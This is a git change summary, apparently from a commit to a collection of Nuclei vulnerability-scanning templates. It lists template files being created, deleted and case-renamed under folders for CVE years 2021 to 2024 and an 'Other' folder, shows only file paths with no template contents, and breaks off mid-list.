nuclei-templates/CVE-2021/{cve-2021-3019.yaml => CVE-2021-3019.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-31249.yaml => CVE-2021-31249.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31537.yaml rename nuclei-templates/CVE-2021/{cve-2021-31581.yaml => CVE-2021-31581.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31589.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31856.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-3223.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-32305.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-32853.yaml rename nuclei-templates/CVE-2021/{cve-2021-3297.yaml => CVE-2021-3297.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-33044.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-33221.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-3377.yaml rename nuclei-templates/CVE-2021/{cve-2021-3378.yaml => 
CVE-2021-3378.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-33904.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34473.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34621.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34640.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-34805.yaml rename nuclei-templates/CVE-2021/{cve-2021-35265.yaml => CVE-2021-35265.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-35464.yaml rename nuclei-templates/CVE-2021/{cve-2021-3577.yaml => CVE-2021-3577.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-36380.yaml => CVE-2021-36380.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-36749.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37216.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37416.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-37589.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37704.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-37833.yaml rename nuclei-templates/CVE-2021/{cve-2021-38647.yaml => CVE-2021-38647.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-38702.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39312.yaml rename nuclei-templates/CVE-2021/{cve-2021-39322.yaml => CVE-2021-39322.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39327.yaml rename nuclei-templates/CVE-2021/{cve-2021-39350.yaml => CVE-2021-39350.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-39501.yaml => CVE-2021-39501.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-40149.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40150.yaml rename nuclei-templates/CVE-2021/{cve-2021-40438.yaml => CVE-2021-40438.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40539.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40875.yaml delete mode 100644 
nuclei-templates/CVE-2021/CVE-2021-41174.yaml rename nuclei-templates/CVE-2021/{cve-2021-41192.yaml => CVE-2021-41192.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-41293.yaml => CVE-2021-41293.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-41349.yaml => CVE-2021-41349.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41467.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41569.yaml rename nuclei-templates/CVE-2021/{cve-2021-41653.yaml => CVE-2021-41653.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-41691.yaml => CVE-2021-41691.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41773.yaml rename nuclei-templates/CVE-2021/{cve-2021-41826.yaml => CVE-2021-41826.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41878.yaml rename nuclei-templates/CVE-2021/{cve-2021-41951.yaml => CVE-2021-41951.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42013.yaml rename nuclei-templates/CVE-2021/{cve-2021-42258.yaml => CVE-2021-42258.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42551.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42565.yaml rename nuclei-templates/CVE-2021/{cve-2021-43495.yaml => CVE-2021-43495.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-44529.yaml rename nuclei-templates/CVE-2021/{cve-2021-44848.yaml => CVE-2021-44848.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45043.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45092.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45380.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-45428.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45968.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46379.yaml rename nuclei-templates/CVE-2021/{cve-2021-46381.yaml => CVE-2021-46381.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46387.yaml delete mode 100644 
nuclei-templates/CVE-2021/CVE-2021-46424.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-1499.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20031.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20090.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20091.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20092.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20792.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21745.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21799.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21801.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21802.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21805.yaml rename nuclei-templates/CVE-2021/{CVE-2021-21816.yaml => cve-2021-21816.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-21973.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21985.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-22502.yaml rename nuclei-templates/CVE-2021/{CVE-2021-23241.yaml => cve-2021-23241.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24226.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24276.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24284.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24288.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24298.yaml => cve-2021-24298.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24316.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24335.yaml => cve-2021-24335.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24488.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24510.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24926.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25033.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25063.yaml create mode 100644 
nuclei-templates/CVE-2021/cve-2021-25085.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25112.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25281.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25646.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-26247.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-26598.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-26855.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-27132.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-27519.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27561.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-28149.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-28151.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-28164.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-28377.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29203.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29442.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29484.yaml rename nuclei-templates/CVE-2021/{CVE-2021-30151.yaml => cve-2021-30151.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-30461.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-31537.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-31589.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-31856.yaml rename nuclei-templates/CVE-2021/{CVE-2021-32172.yaml => cve-2021-32172.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-3223.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-32305.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-32853.yaml rename nuclei-templates/CVE-2021/{CVE-2021-3293.yaml => cve-2021-3293.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-33044.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-33221.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-3377.yaml create mode 
100644 nuclei-templates/CVE-2021/cve-2021-33904.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34473.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34621.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34640.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-34805.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-35464.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-36749.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37216.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37416.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37580.yaml => cve-2021-37580.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-37589.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37704.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-37833.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-38702.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-39312.yaml rename nuclei-templates/CVE-2021/{CVE-2021-39316.yaml => cve-2021-39316.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-39327.yaml rename nuclei-templates/CVE-2021/{CVE-2021-39433.yaml => cve-2021-39433.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40149.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40150.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40539.yaml rename nuclei-templates/CVE-2021/{CVE-2021-40868.yaml => cve-2021-40868.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-40875.yaml rename nuclei-templates/CVE-2021/{CVE-2021-40960.yaml => cve-2021-40960.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-40978.yaml => cve-2021-40978.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-41174.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41467.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41569.yaml rename nuclei-templates/CVE-2021/{CVE-2021-41649.yaml => 
cve-2021-41649.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-41878.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42013.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42551.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42565.yaml rename nuclei-templates/CVE-2021/{CVE-2021-43496.yaml => cve-2021-43496.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-44529.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45043.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45092.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45380.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-45428.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45968.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46379.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46387.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46424.yaml rename nuclei-templates/CVE-2022/{cve-2022-0148.yaml => CVE-2022-0148.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0165.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0201.yaml rename nuclei-templates/CVE-2022/{cve-2022-0271.yaml => CVE-2022-0271.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0288.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0422.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0482.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0540.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0543.yaml rename nuclei-templates/CVE-2022/{cve-2022-0591.yaml => CVE-2022-0591.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0653.yaml rename nuclei-templates/CVE-2022/{cve-2022-0692.yaml => CVE-2022-0692.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0776.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0870.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1040.yaml 
create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1119.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1221.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1388.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1392.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1609.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1904.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1906.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-21500.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2187.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22536.yaml rename nuclei-templates/CVE-2022/{cve-2022-22954.yaml => CVE-2022-22954.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-22963.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22972.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23131.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23134.yaml rename nuclei-templates/CVE-2022/{cve-2022-23347.yaml => CVE-2022-23347.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-23779.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23881.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24112.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24129.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24181.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24260.yaml rename nuclei-templates/CVE-2022/{cve-2022-24288.yaml => CVE-2022-24288.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2486.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2487.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26134.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-26135.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-26138.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26148.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26159.yaml 
delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26233.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26960.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-27927.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-28079.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28080.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28219.yaml rename nuclei-templates/CVE-2022/{cve-2022-28365.yaml => CVE-2022-28365.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29014.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29298.yaml rename nuclei-templates/CVE-2022/{cve-2022-29303.yaml => CVE-2022-29303.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29383.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29548.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-30776.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31268.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31373.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32015.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32022.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32025.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32026.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32409.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-33119.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-34047.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-35416.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-35914.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-36883.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0165.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0201.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0218.yaml => cve-2022-0218.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0288.yaml delete mode 100644 
nuclei-templates/CVE-2022/cve-2022-0422.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0482.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0540.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0543.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0653.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0776.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0870.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0921.yaml => cve-2022-0921.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1040.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1119.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1221.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1388.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1392.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1609.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1904.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1906.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-21500.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-2187.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22536.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22972.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23131.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23134.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-23779.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23881.yaml rename nuclei-templates/CVE-2022/{CVE-2022-23944.yaml => cve-2022-23944.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-24112.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-24129.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24181.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24260.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-2486.yaml delete mode 100644 
nuclei-templates/CVE-2022/cve-2022-2487.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26134.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-26135.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-26138.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26148.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26159.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26233.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26960.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-27927.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-28079.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28080.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29014.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29298.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29383.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29548.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-30776.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31268.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31373.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32015.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32022.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32025.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32026.yaml rename nuclei-templates/CVE-2022/{CVE-2022-32159.yaml => cve-2022-32159.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-32409.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-33119.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-34047.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-35416.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-36883.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-23752.yaml create mode 100644 
nuclei-templates/CVE-2023/CVE-2023-35047.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-3836.yaml create mode 100644 nuclei-templates/CVE-2023/Cve-2023-23752.yaml rename nuclei-templates/{Other/gradio-CVE-2024-1561.yaml => CVE-2024/CVE-2024-1561.yaml} (100%) rename nuclei-templates/CVE-2024/{cve-2024-23897.yaml => CVE-2024-23897.yaml} (100%) create mode 100644 nuclei-templates/CVE-2024/CVE-2024-38693.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39641.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39642.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39643.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39646.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39647.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39648.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39649.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39651.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39652.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39653.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39655.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39656.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39658.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39659.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39660.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39661.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39663.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39664.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39665.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-39668.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-40422.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-41628.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5057.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5226.yaml create mode 100644 
nuclei-templates/CVE-2024/CVE-2024-5668.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5975.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6254.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6552.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6824.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6869.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6987.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7008.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7150.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7350.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7486.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7492.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7548.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7560.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7561.yaml delete mode 100644 nuclei-templates/Other/0x71rex-blind-xss.yaml create mode 100644 nuclei-templates/Other/0xlfi3.yaml create mode 100644 nuclei-templates/Other/0xlfifuzz1.yaml rename nuclei-templates/{CVE-2021/CVE-2021-20837.yaml => Other/2021-20837.yaml} (100%) create mode 100644 nuclei-templates/Other/44 - T9.yaml create mode 100644 nuclei-templates/Other/74cms-sqli-10.yaml delete mode 100644 nuclei-templates/Other/74cms-sqli.yaml rename nuclei-templates/Other/{aic-leakage.yaml => AIC-leakage.yaml} (100%) rename nuclei-templates/Other/{apache-ambari-weakpass.yaml => APACHE-Ambari-weakPass.yaml} (100%) create mode 100644 nuclei-templates/Other/API-Linkfinder.yaml delete mode 100644 nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml create mode 100644 nuclei-templates/Other/ATHD-DVR-fileRead.yaml rename nuclei-templates/Other/{advantech-webaccess.yaml => Advantech-WebAccess.yaml} (100%) delete mode 100644 nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml rename nuclei-templates/Other/{apereo-cas-rce.yaml => Apereo-Cas-rce.yaml} (100%) rename 
nuclei-templates/Other/{b2bbuilder-sqli.yaml => B2BBuilder-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/BOA-Web-fileRead.yaml rename nuclei-templates/Other/{biometric-detect.yaml => Biometric-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/Bitrix_check_env.yaml create mode 100644 nuclei-templates/Other/BlindSQL.yaml create mode 100644 nuclei-templates/Other/CL-TE-http-smuggling.yaml create mode 100644 nuclei-templates/Other/CNVD-2019-17294.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-56167.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-17369.yaml rename nuclei-templates/Other/{cnvd-2021-28277-1107.yaml => CNVD-2021-28277.yaml} (100%) create mode 100644 nuclei-templates/Other/CRMEB-sqli.yaml rename nuclei-templates/{CVE-2023/CVE-2023-49442.yaml => Other/CVE_2023_49442.yaml} (100%) create mode 100644 nuclei-templates/Other/Cache_to_xss.yaml rename nuclei-templates/Other/{diaowen-fileread.yaml => DIAOWEN-fileRead.yaml} (100%) rename nuclei-templates/Other/{Dahua_getFaceCapture_Sqli.yaml => Dahua_Video_FileUpload.yaml} (100%) rename nuclei-templates/Other/{e-message-database.yaml => E-message-database.yaml} (100%) delete mode 100644 nuclei-templates/Other/GLPI-9.3.3-SQL-Injection.yaml rename nuclei-templates/Other/{hadoop-yarn-rpc-rce.yaml => Hadoop-Yarn-RPC-RCE.yaml} (100%) rename nuclei-templates/Other/{Hikvision_Env_Information_Leakage.yaml => Hikvision_iVMS-8700_Fileupload_Files.yaml} (100%) rename nuclei-templates/Other/{Hikvision_iVMS-8700_upload_action.yaml => Hikvision_iVMS-8700_upload.yaml} (100%) rename nuclei-templates/Other/{jeewms-fileread.yaml => JEEWMS-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml delete mode 100644 nuclei-templates/Other/MinIO-default-login.yaml rename nuclei-templates/Other/{mobileiron(1).yaml => MobileIron.yaml} (100%) rename nuclei-templates/Other/{netsurveillance-fileread.yaml => NETSurveillance-fileRead.yaml} (100%) create 
